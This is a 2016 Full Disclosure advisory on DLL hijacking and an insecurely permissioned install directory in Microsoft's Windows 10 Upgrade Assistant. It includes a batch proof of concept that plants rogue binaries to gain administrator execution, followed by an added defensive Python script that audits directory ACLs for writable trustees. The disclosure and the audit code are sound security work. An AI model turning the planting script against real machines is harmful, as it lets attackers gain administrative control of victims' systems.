Full Disclosure mailing list archives
Executable installers are vulnerable^WEVIL (case 38): Microsoft's Windows10Upgrade*.exe allows elevation of privilege
From: "Stefan Kanthak" <stefan.kanthak () nexgo de>
Date: Thu, 11 Aug 2016 19:54:48 +0200
Hi @ll,

the "Windows 10 Upgrade Assistant" Windows10Upgrade*.exe, available via
<http://go.microsoft.com/fwlink/?LinkId=822783> on
<https://www.microsoft.com/en-us/accessibility/windows10upgrade>, via
<http://go.microsoft.com/fwlink/?LinkId=821403> on
<https://support.microsoft.com/en-us/help/12387/windows-10-update-history>,
and on <https://www.microsoft.com/en-us/software-download/windows10>,

1. is vulnerable to DLL hijacking (see
   <https://cwe.mitre.org/data/definitions/426.html> and
   <https://cwe.mitre.org/data/definitions/427.html> for this
   WELL-KNOWN vulnerability);

2. creates an unsafe directory "C:\Windows10Upgrade\" (see
   <https://cwe.mitre.org/data/definitions/277.html> and
   <https://cwe.mitre.org/data/definitions/732.html> for this
   WELL-KNOWN vulnerability).

Both vulnerabilities allow arbitrary code execution WITH elevation of
privilege!

Ad 1.:
~~~~~~

Applications which are offered as downloads to unsuspecting users will
typically be saved into the user's "Downloads" directory ... which is
but a digital minefield: see
<https://insights.sei.cmu.edu/cert/2008/09/carpet-bombing-and-directory-poisoning.html>,
<http://blog.acrossecurity.com/2012/02/downloads-folder-binary-planting.html>
and <http://seclists.org/fulldisclosure/2012/Aug/134>

On a fully patched Windows 7 SP1, Windows10Upgrade*.exe loads and
executes the following DLLs from its "application directory" (which
typically happens to be the user's "Downloads" directory):

  cabinet.dll, version.dll, propsys.dll, ntmarta.dll, linkinfo.dll,
  ntshrui.dll, srvcli.dll, cscapi.dll, slc.dll, secur32.dll, netutils.dll

On other versions of Windows the list of DLLs may vary.

Since its application manifest specifies "requireAdministrator",
Windows10Upgrade*.exe runs with administrative privileges: all DLLs it
loads and executes run with administrative privileges too, resulting in
arbitrary code execution WITH elevation of privilege.
If an attacker is able to place the DLLs named above per "drive-by
download" in the user's "Downloads" directory (and the user then runs
Windows10Upgrade*.exe from there), this becomes a remote code execution
WITH elevation of privilege.

Ad 2.:
~~~~~~

Upon execution Windows10Upgrade*.exe creates the directory
"C:\Windows10Upgrade\", extracts its payload into it, creates a shortcut
"Windows 10 Upgrade Assistant" in the start menu and finally starts
"C:\Windows10Upgrade\Windows10UpgraderApp.exe" with administrative
privileges.

The (inherited) NTFS permissions of the directory "C:\Windows10Upgrade\"

  D:AI(A;OICIID;FA;;;BA)(A;OICIID;FA;;;SY)(A;OICIID;0x1200a9;;;BU)(A;OICIID;0x1301bf;;;AU)

  BUILTIN\Administrators:             full access
  NT AUTHORITY\SYSTEM:                full access
  BUILTIN\Users:                      read, execute
  NT AUTHORITY\Authenticated Users:   read, write, execute, delete

allow UNPRIVILEGED users to (over)write files in this directory, for
example using the following batch script (the "rogue" binaries
sentinel.exe and sentinel.dll are available from
<http://home.arcor.de/skanthak/sentinel.html>):

--- poc.cmd ---
Rem Busy-wait until the installer has created the target directory
:WAIT
@If Not Exist "%SystemDrive%\Windows10Upgrade" Goto :WAIT
Rem Plant the rogue binaries under the names Windows10UpgraderApp.exe
Rem resolves from its application directory
Copy sentinel.exe "%SystemDrive%\Windows10Upgrade\HTTPHelper.exe"
Copy sentinel.dll "%SystemDrive%\Windows10Upgrade\DXGIDebug.dll"
Copy sentinel.dll "%SystemDrive%\Windows10Upgrade\MSACM32.drv"
For %%! In (mfc42u, odbc32, version, winhttp, webio, xmllite, cryptsp, rpcrtremote, api-ms-win-downlevel-shlwapi-l2-1-0, sxs, propsys, apphelp, secur32, uxtheme, msls31, oleacc, d2d1, dwrite, dxgi, dwmapi, dxgidebug, d3d11, d3d10warp, mlang, winmm, slc, iphlpapi, dnsapi, dhcpcsvc, midimap, wer) Do Copy sentinel.dll "%SystemDrive%\Windows10Upgrade\%%!.dll"
--- EOF ---

"C:\Windows10Upgrade\Windows10UpgraderApp.exe" loads and executes these
DLLs and EXEs with administrative rights, again resulting in elevation
of privilege.

stay tuned
Stefan Kanthak

Timeline:
~~~~~~~~~
2016-08-03    vulnerability report sent to vendor
2016-08-05    vendor replies: "We won't be creating an MSRC case for this."
2016-08-11    report published

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
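Both findings reduce to the same question: which principals may create or replace files in the directory an elevated process loads code from (the user's "Downloads" directory in Ad 1., "C:\Windows10Upgrade\" in Ad 2.). The following Python is an added example, not code from the advisory: it decodes a DACL given in SDDL form, such as the one quoted above, and reports the low-privilege trustees that hold file-planting rights. The access-mask bits and two-letter tokens are the documented winnt.h/sddl.h values; WINDOWS10UPGRADE_DACL is the string from the advisory, while HARDENED_DACL is a constructed illustration of what a safe layout would look like (inheritance cut, only Administrators and SYSTEM may write), not anything Microsoft ships.

```python
"""Decode a directory DACL in SDDL form and report which low-privilege
trustees may create, replace or delete entries in the directory.

Added example; not code from the advisory. Constants are the documented
winnt.h/sddl.h values, HARDENED_DACL is a constructed illustration.
"""
import re

# File/directory access-mask bits (winnt.h)
FILE_WRITE_DATA   = 0x00000002   # on a directory: create files
FILE_APPEND_DATA  = 0x00000004   # on a directory: create subdirectories
FILE_DELETE_CHILD = 0x00000040
DELETE            = 0x00010000
WRITE_DAC         = 0x00040000
WRITE_OWNER       = 0x00080000
GENERIC_ALL       = 0x10000000
GENERIC_EXECUTE   = 0x20000000
GENERIC_WRITE     = 0x40000000
GENERIC_READ      = 0x80000000

# Any one of these lets a trustee plant or replace a file the loader will pick up.
PLANT_BITS = {
    "FILE_WRITE_DATA": FILE_WRITE_DATA, "FILE_APPEND_DATA": FILE_APPEND_DATA,
    "FILE_DELETE_CHILD": FILE_DELETE_CHILD, "DELETE": DELETE,
    "WRITE_DAC": WRITE_DAC, "WRITE_OWNER": WRITE_OWNER,
    "GENERIC_WRITE": GENERIC_WRITE, "GENERIC_ALL": GENERIC_ALL,
}
PLANT_MASK = sum(PLANT_BITS.values())   # distinct bits, so sum == OR

# Two-letter SDDL rights tokens (sddl.h); "0x..." hex masks are accepted too.
RIGHTS = {
    "GA": GENERIC_ALL, "GR": GENERIC_READ, "GW": GENERIC_WRITE, "GX": GENERIC_EXECUTE,
    "RC": 0x00020000, "SD": DELETE, "WD": WRITE_DAC, "WO": WRITE_OWNER,
    "FA": 0x001F01FF, "FR": 0x00120089, "FW": 0x00120116, "FX": 0x001200A0,
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10,
    "WP": 0x20, "DT": 0x40, "LO": 0x80, "CR": 0x100,
}

# Well-known trustee aliases; any other SID is kept as its literal string.
TRUSTEES = {
    "BA": "BUILTIN\\Administrators", "SY": "NT AUTHORITY\\SYSTEM",
    "BU": "BUILTIN\\Users", "AU": "NT AUTHORITY\\Authenticated Users",
    "WD": "Everyone", "IU": "NT AUTHORITY\\INTERACTIVE",
    "AN": "NT AUTHORITY\\ANONYMOUS LOGON", "CO": "CREATOR OWNER",
}
LOW_PRIVILEGE = {TRUSTEES[a] for a in ("BU", "AU", "WD", "IU", "AN")}

ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_rights(token):
    """'0x1301bf' -> int; 'SDGXGWGR' -> OR of the two-letter tokens."""
    if token[:2].lower() == "0x":
        return int(token, 16)
    if len(token) % 2:
        raise ValueError("odd-length rights token: %r" % token)
    mask = 0
    for i in range(0, len(token), 2):
        mask |= RIGHTS[token[i:i + 2]]
    return mask


def parse_dacl(sddl):
    """Return (DACL control flags, [(type, {flags}, mask, trustee), ...])."""
    m = re.search(r"D:([A-Z]*)((?:\([^)]*\))*)", sddl)
    if m is None:
        raise ValueError("no DACL (D:) component in SDDL string")
    aces = []
    for body in ACE_RE.findall(m.group(2)):
        fields = body.split(";")
        if len(fields) != 6:
            raise ValueError("malformed ACE: (%s)" % body)
        ace_type, flags, rights, _obj_guid, _inh_guid, sid = fields
        flag_set = {flags[i:i + 2] for i in range(0, len(flags), 2)}
        aces.append((ace_type, flag_set, parse_rights(rights), TRUSTEES.get(sid, sid)))
    return m.group(1), aces


def plant_rights(mask):
    """Names of the PLANT_BITS set in mask, in ascending bit order."""
    return [n for n, b in sorted(PLANT_BITS.items(), key=lambda kv: kv[1]) if mask & b]


def planting_trustees(sddl):
    """Low-privilege trustees granted PLANT_BITS by an allow ACE that is
    effective on the directory itself (inherit-only ACEs are skipped).

    Simplification: an earlier explicit deny of a plant bit for the same
    trustee suppresses the report, mirroring in-order ACE evaluation;
    group membership (a user is in both BU and AU) is not resolved.
    """
    _control, aces = parse_dacl(sddl)
    denied, found = set(), []
    for ace_type, flags, mask, trustee in aces:
        if "IO" in flags or trustee not in LOW_PRIVILEGE or not (mask & PLANT_MASK):
            continue
        if ace_type == "D":
            denied.add(trustee)
        elif ace_type == "A" and trustee not in denied:
            found.append((trustee, plant_rights(mask), "ID" in flags))
    return found


# DACL of C:\Windows10Upgrade\ as reported in the advisory (Windows 7 SP1).
WINDOWS10UPGRADE_DACL = ("D:AI(A;OICIID;FA;;;BA)(A;OICIID;FA;;;SY)"
                         "(A;OICIID;0x1200a9;;;BU)(A;OICIID;0x1301bf;;;AU)")
# Constructed illustration (assumption, not a Microsoft ACL): protected
# DACL (P) so nothing is inherited from C:\, only BA/SY may write.
HARDENED_DACL = "D:P(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;0x1200a9;;;BU)"

if __name__ == "__main__":
    for label, dacl in (("as shipped", WINDOWS10UPGRADE_DACL), ("hardened", HARDENED_DACL)):
        hits = planting_trustees(dacl)
        print("%s: %s" % (label, "no low-privilege write access" if not hits else ""))
        for trustee, rights, inherited in hits:
            print("  %s can plant files via %s%s" % (
                trustee, ", ".join(rights), " (inherited ACE)" if inherited else ""))
```

On a live system the SDDL string for a directory can be read with `(Get-Acl C:\Windows10Upgrade).Sddl` in PowerShell and fed to planting_trustees(); the same check applies to any application directory an elevated installer runs from, the "Downloads" directory included.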